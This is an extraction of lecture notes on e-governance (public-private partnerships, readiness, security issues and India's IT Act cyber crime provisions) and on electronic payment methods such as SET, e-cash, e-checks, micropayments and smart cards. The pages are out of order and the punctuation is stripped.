A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 14
14
Features of Payment Methods
bull Anonymity whether the payment method is anonymous
bull Security whether the payment method is secure
bull Overhead cost the overhead cost of processing a payment
bull Transferability whether a payment can be carried out without the involvement of a
third party
bull Divisibility whether a payment can be divided into arbitrary small payments whose
sum is equal to the original payment
bull Acceptability whether the payment method is supported globally
4C PAYMENTS METHODS
To make the e-commerce system functional we also need to incorporate payment
functions into the system
In the physical world there are 4 types of payment methods
bull Cash
bull Credit card
bull Check
bull Creditdebit (Fund Transfer)
bull Payment method should be
ndash Very secure
ndash Having Low overhead cost
ndash Transferable
ndash Acceptable anywhere
ndash Divisible
ndash Anonymous
Comparison of the 4C payment methods
PREPARED BY ARUN PRATAP SINGH 15
15
SET PROTOCOL FOR CREDIT CARD PAYMENT
bull The credit card is one of the most commonly used payment methods in e-commerce in particular B2C e-commerce
bull Before the introduction SET protocol secure credit card payment was usually carried out over an SSL connection
Advantage of SSL
bull It ensures the secure transmission of credit card information over the internet
Disadvantage of SSL
bull It is not a complete credit card payment method
bull For example it cannot support on-line credit card authorization
SET is specially developed to provide secure credit card payment over the internet
It is now widely supported by major credit card companies including Visa and
MasterCard
PREPARED BY ARUN PRATAP SINGH 16
16
bull SET aims at satisfying the following security requirements in the context of credit card
payment
ndash Confidentiality - Sensitive messages are encrypted so that they are kept
confidential
ndash Integrity - Nearly all messages are digitally signed to ensure content integrity
ndash Authentication - Authentication is performed through a public key infrastructure
SET network architecture
Merchant a seller which is connected to an acquirer
Cardholder a registered holder of the credit card who is a buyer
Issuer the bank that issues the credit card to a cardholder
Acquirer the bank that serves as an ldquoagentrdquo to link a merchant to multiple issuers
bull A merchant can process various credit cards through a single acquirer
bull Payment Gateway This is typically connected to the acquirer
ndash The payment gateway is situated between the SET system and the financial
network of the current credit card system for processing the credit card payment
SET Digital Certificate System
PREPARED BY ARUN PRATAP SINGH 17
17
Dual signature generation and verification ndash
bull In the physical credit card system
ndash the Payment Instructions (PI) including the cardholderrsquos credit card number and
signature are not kept confidential
ndash data integrity can basically be ensured by using printed receipts
ndash cardholderrsquos authentication relies on simple signature checking only
bull In an electronic credit card system
ndash the Order Information (OI) and PI can be digitally signed to ensure data integrity
ndash the sensitive credit card information may still be disclosed to other people
bull SET introduces a novel method called the dual signature (DS) to ensure data integrity
while protecting the sensitive information
PREPARED BY ARUN PRATAP SINGH 18
18
How the merchant and the payment gateway can verify the DS
bull The merchant is provided with OI H[PI] and DS
bull The dual signature can be verified as follows
Step 1 The merchant first finds
H[ H[PI] || H[OI] ]
Step 2 He then decrypts the digital signature with the cardholderrsquos public signature key as
follows
DRSA[ DS | keypublic_sign cardholder ]
Where
keypublic_sign cardholder public signature key of the cardholder
PREPARED BY ARUN PRATAP SINGH 19
19
Step 3 Finally he compares the two terms H[H[PI] || H[OI]] and
DRSA[DS | keypublic_signcardholder ]
They should be the same if the transmitted DS has not been changed otherwise the order is
not valid
The payment gateway is provided with PI H[OI] and DS
By using the dual signature method each cardholder can link OI and PI while releasing
only the necessary information to the relevant party
If either the OI or PI is changed the dual signature will no longer be valid
DIGITAL ENVELOPE ndash
PREPARED BY ARUN PRATAP SINGH 20
20
SET PROTOCOL ndash
SET protocol has four phases initiation purchase authorization and capture
First the cardholder sends a purchase initiation request to the merchant for initializing
the payment
Then the merchant returns a response message to the cardholder
In the second phase the cardholder sends the purchase order together with the
payment instruction to the merchant
In the third phase the merchant obtains the authorization from the issuer via the
payment gateway
Finally the merchant requests a money transfer to its account
E-CASH
Electronic money is paperless cash This money is either stored on a card itself or in an account
associated with the card
The most common examples are transit cards meal plans and PayPal E-Cash can also mean
any kind of electronic payment
Electronic payment systems come in many forms including virtual cheques ATM cards credit
cards and stored value cards The usual security features for such systems are privacy
authenticity and no repudiation
There are four major components in an electronic cash system
Issuers
Customers
Merchants or traders
Regulators
Issuers can be banks or non-bank institutions
PREPARED BY ARUN PRATAP SINGH 21
21
customers are referred to users who spend E-Cash
Merchants and traders are vendors who receive E-Cash
regulators are defined as related authorities or state tax agencies
For an E-Cash transaction to occur we need to go through at least three stages
Account Setup Customers will need to obtain E-Cash accounts through certain issuers
Merchants who would like to accept E-Cash will also need to arrange accounts from
various E-Cash issuers Issuers typically handle accounting for customers and
merchants
Purchase Customers purchase certain goods or services and give the merchants
tokens which represent equivalent E-Cash Purchase information is usually encrypted
when transmitting in the networks
Authentication Merchants will need to contact E-Cash issuers about the purchase and
the amount of E-Cash involved E-Cash issuers will then authenticate the transaction
and approve the amount E-Cash involved
E-cash payment system ndash
For accessing the services online e-cash is a prime method for secure online payments
The following model shows how e cash payment system works
PREPARED BY ARUN PRATAP SINGH 22
22
This is a simple model of E-cash payment system This gives us the idea of how e-cash
payment system works The model is explained properly in upcoming slides
The customer approaches his issuer(bankrsquos) site for accessing his account The issuer in return
issues the money in form of a token which is generally in form of tens and hundreds or as per
specified by the customer
In second phase the customer will endorse those tokens to the merchant for acquiring services
for which the customer will authenticate the payment for the trader
PREPARED BY ARUN PRATAP SINGH 23
23
In third phase the trader will approach the token issuer(customerrsquos bank) and after
authenticating the tokens the issuing bank will convert the tokens into electronic fund and the
same will be transferred into traderrsquos account
Finally after getting the payment for the respective services the trader provides the requisite
service or product and also notifies the customer about the approval of payment made by
customer in traderrsquos account
A system that allows a person to pay for goods or services by transmitting a number
from one computer to another
Like the serial numbers on real currency notes the E-cash numbers are unique
This is issued by a bank and represents a specified sum of real money
PREPARED BY ARUN PRATAP SINGH 24
24
It is anonymous and reusable
Electronic Cash Security
Complex cryptographic algorithms prevent double spending
Anonymity is preserved unless double spending is attempted
Serial numbers can allow tracing to prevent money laundering
E-Cash Processing
E-cash security
Security is of extreme importance while handling the online transactions Faith in the security of
the medium of exchange whether paper or digital is essential for the economy to function
E-cash is much secure than other online payment modes because in this case no credential such
as card-passwords or anything such is involved Its like simply the online fund transfer from
customerrsquos account to traderrsquos account
PREPARED BY ARUN PRATAP SINGH 25
25
However while accessing the customerrsquos account the customer must keep in mind the internet
security sweep or theft The online hacking and cracking can be avoided by using SSL and TSL
website security systems and keeping the website link with safe ldquoHttps ldquo protocols and proper
internet security softwares to keep aside the threats of malware evasdrooping and other security
threats
Advantages
We can transfer funds purchase stocks and offer a variety of other services without
having to handle physical cash or cheques
Electronic cash protects its user against theft With electronic cash the customer does
not need to provide financial information
E-cash supports small payments Other online payment system charge a fee for every
transaction no matter how much high or low it is but e-cash has a specific limit for
additional charges thatrsquos why very low payments are not charged a fee
Limitations
Maybe how much secure the e-cash payment system is but still no one is safe against
the online frauds In this case the trader is referred as fraudulent The trader may take
the amount but may not provide the services
While making the payment its very important that the internet connection and power
supply should be active If the payment is in process and internet supply fails in between
it can lead to loss of information ie amount will be charged but it wont reach to trader
and the refund takes very long time in general the refund time is at least 30-45 days
E-Cash is not for everyone Low income segments without computer and internet access
are unable to enjoy the usage of E-Cash
The rise of E-Cash is inevitable but further improvements are needed Tackling security
anonymity low income group readiness and technology reliability issues will make E-Cash more
perfect In countries such as India where people were hesitant to use such methods has shown
a tremendous use of online payments and E-cash payment system Slowly but steadily the growth
is seen and improving it technologically will make it more reliable and efficient for customers to
use it
PREPARED BY ARUN PRATAP SINGH 26
26
E-CHECK
What is an electronic check
Itrsquos simply an electronic version of a paper check When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and moneymdashand because electronic checks have more security features than a paper check they better protect your business and customers Another way to think of an electronic check is when a customer pays by entering in their bank account information online and electronically sending the money Electronic checks are becoming increasingly popular because they are so fast efficient and secure Electronic checks are sometimes called eChecks electronic check conversions or Back Office Conversions (BOCs) Read more on what you need to know as you consider using eChecks in your business
eCheck a new payment instrument combining the security speed and processing efficiencies of
all-electronic transactions with the familiar and well-developed legal infrastructure and business
processes associated with paper checks is the first and only electronic payment mechanism
chosen by the United States Treasury to make high-value payments over the public Internet
How electronic checks work
The process is simple First you run a customerrsquos paper check through an electronic scanner system supplied by your merchant service provider This virtual terminal captures the customers banking information and the payment amount The information is then transferred electronically over the Federal Reserve Banks ACH Network which takes the funds from your customers account and deposits them into yours After payment approval the virtual terminal will print a receipt for the customer to sign and keep Your employee should then void the paper check and return it to the customer Yoursquoll be able to view and report on your merchant transactions online although features may vary depending on your merchant service provider or your payment processing solution provider
How does the ACH Network work with eChecks
The ACH Network is a funds distribution system that moves funds electronically from one entity to another Itrsquos a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed) Given its ability to electronically transfer money directly to and from bank accounts ACH is a faster payment method than traditional paper checks The ACH payment process is close to the paper check process only faster Clients give their bank routing or checking account number and after verification the payment is transferred quite immediately electronically through the ACH system Besides checks the ACH Network also handles debit card transactions direct deposits of payroll Social Security and other government benefits direct debit payments and business-to-business payments
PREPARED BY ARUN PRATAP SINGH 27
27
Reaping the benefits of eChecks
Converting your customersrsquo paper checks into electronic checks helps save time and reduces hassle for your staff because you can submit payments electronically instead of making trips to the bank However time saving and hassle reduction are not the only benefits Read on for more 1 Reduce processing costs by up to 60 eChecks require less manpower to process and donrsquot come with any deposit or transaction fees As a result processing an eCheck is generally much cheaper than processing a paper check or credit card transaction 2 Receive funds sooner Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing Billing companies often receive payments within one day 3 Increase sales If your business doesnrsquot accept paper checks offering eChecks expands your customersrsquo options and can increase sales If yoursquore converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud 4 Work smarter and greener Electronic check conversion is easy to set up It relies on the trusted ACH Network And eChecks help reduce the more than 674 million gallons of fuel used and 36 million tons of greenhouse gas emissions created by transporting paper checks 5 Decrease errors and fraud eChecks reduce the potential for errors and fraud because fewer people handle them Merchant service providers also maintain monitor and check files against negative account databases that store information about individuals or companies that have records of fraud
Protecting your businessmdashand your customers
Electronic check conversion is one of the most secure payment methods in the electronic payment processing industry because it uses the latest information protection features 1 Authentication Merchants must verify that the person providing the checking account information has the authority to use that account Authentication services and products available to merchants include digital signatures and public key cryptography Also known as digital certificates digital signatures encrypt data in a way that gives the receiver a more reliable indication that the information was actually sent by the sender Theyrsquore used on the Internet to confirm the identity of a customer much as a handwritten signature would Because digital signatures are difficult to tamper with or imitate and are easily transportable theyrsquore a good way to verify identity Digital signatures are often used to implement electronic signatures which include any electronic data that carries the intent of a signature Public key cryptography is a security method that uses keys to encrypt and decrypt a sent message With electronic check conversion the private key is a secret mathematical calculation used to create the digital signature on the echeck and the public key is the key given to anyone
PREPARED BY ARUN PRATAP SINGH 28
28
who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with 2 Duplicate detection Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks 3 Encryption The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL) How to get started with electronic checks
Herersquos how to implement electronic check conversion as quickly and easily as possible 1 Choose a well-established processing company Good pricing is important but working with a reliable processor is essential 2 Notify your customers that your business will begin using electronic check conversion Federal laws require you to post a notification about this change and give your customers a takeaway copy You must also provide customers with a phone number to request more information 3 Look for a processor that makes it easy to align your current business processes with your new electronic processing system export customer data and integrate your new system with your business management software 4 QuickBooks Payments offers a complete payment processing solution Businesses can take payments from their customers in many ways- from ACH bank payments electronic checks to credit cards including Visa MasterCard Discover and American Express In addition to offering many ways to get paid QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature
This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service
1 Payer (customerbill payer) is prompted to authorize electronic debit enter bank routing number (ABA) and account number
PREPARED BY ARUN PRATAP SINGH 29
29
2 Merchants sales system securely transfers order information to CyberSource over the Internet
3 CyberSource forwards bank routing number and account number to processor 4 The routing number and account number are validated and the integrity of the accounts
checking history is verified Processor forwards approvedecline results to CyberSource 5 CyberSource returns approvaldecline message to merchant 6 If approved CyberSource routes check for settlement through a processer to the
Automated Clearinghouse System (ACH) Funds are deposited in approximately 1-3 business days
Four Different Scenarios of the FSTC E-check System ndash
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
